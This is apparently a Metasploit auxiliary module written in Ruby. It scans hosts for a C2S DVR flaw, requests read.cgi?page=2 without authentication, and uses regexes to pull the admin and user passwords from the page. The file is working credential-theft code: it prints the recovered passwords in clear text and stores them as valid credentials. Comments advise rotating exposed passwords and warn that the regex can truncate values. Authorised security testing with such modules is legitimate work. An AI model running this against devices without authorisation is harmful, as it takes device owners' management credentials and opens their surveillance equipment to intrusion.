GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary scanner for the C2S DVR management password disclosure (EDB 40265).
#
# For each host it requests `cgi-bin/read.cgi?page=2` under TARGETURI with no
# authentication and looks for the `pw_adminpw` / `pw_userpw` assignments in the
# returned page. A hit means the device hands its management passwords to any
# client that can reach the web interface, so a recovered value should be
# treated as compromised: rotate it and restrict access to that interface.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Declares the module metadata and the single TARGETURI option.
  def initialize
    super(
      'Name' => 'C2S DVR Management Password Disclosure',
      'Description' => %q{
        C2S DVR allows an unauthenticated user to disclose the username
        & password by requesting the javascript page 'read.cgi?page=2'.
        This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
      },
      'References' => [['EDB', '40265']],
      'Author' => [
        'Yakir Wizman', # discovery
        'h00die', # module
      ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Aug 19 2016'
    )

    register_options(
      [
        OptString.new('TARGETURI', [false, 'URL of the C2S DVR root', '/'])
      ]
    )
  end

  # Checks one host for the disclosure and records any password it returns.
  #
  # @param rhost [String] host supplied by the scanner mixin; the request is
  #   built from the datastore and `peer`, so the argument itself is not read.
  # @return [void]
  def run_host(rhost)
    url = normalize_uri(datastore['TARGETURI'], 'cgi-bin', 'read.cgi')
    vprint_status("Attempting to load data from #{url}?page=2")

    query = { 'page' => '2' }
    res = send_request_cgi({ 'uri' => url, 'vars_get' => query })

    unless res
      print_error("#{peer} Unable to connect to #{url}")
      return
    end

    page = res.body

    # 'pw_enflag' is used as the marker that this is the expected settings
    # page; any other body is reported as invalid and not parsed further.
    unless page.include?('pw_enflag')
      print_error("Invalid response received for #{peer} for #{url}")
      return
    end

    # NOTE(review): the lazy `(.+?)` capture ends at the first `";`, so a
    # password containing that sequence is truncated, and an empty password
    # followed by further assignments on the same line may capture unrelated
    # text - confirm against real device output before trusting the value.
    # Each recovered password is printed in clear text and passed to
    # store_valid_credential, so console logs and the workspace hold secrets.
    admin_pw = page[/pw_adminpw = "(.+?)";/, 1]
    if admin_pw
      print_good("Found: admin:#{admin_pw}")
      store_valid_credential(user: 'admin', private: admin_pw, private_type: :password)
    end

    user_pw = page[/pw_userpw = "(.+?)";/, 1]
    if user_pw
      print_good("Found: user:#{user_pw}")
      store_valid_credential(user: 'user', private: user_pw, private_type: :password)
    end
  rescue ::Rex::ConnectionError
    print_error("#{peer} Unable to connect to site")
    nil
  end
end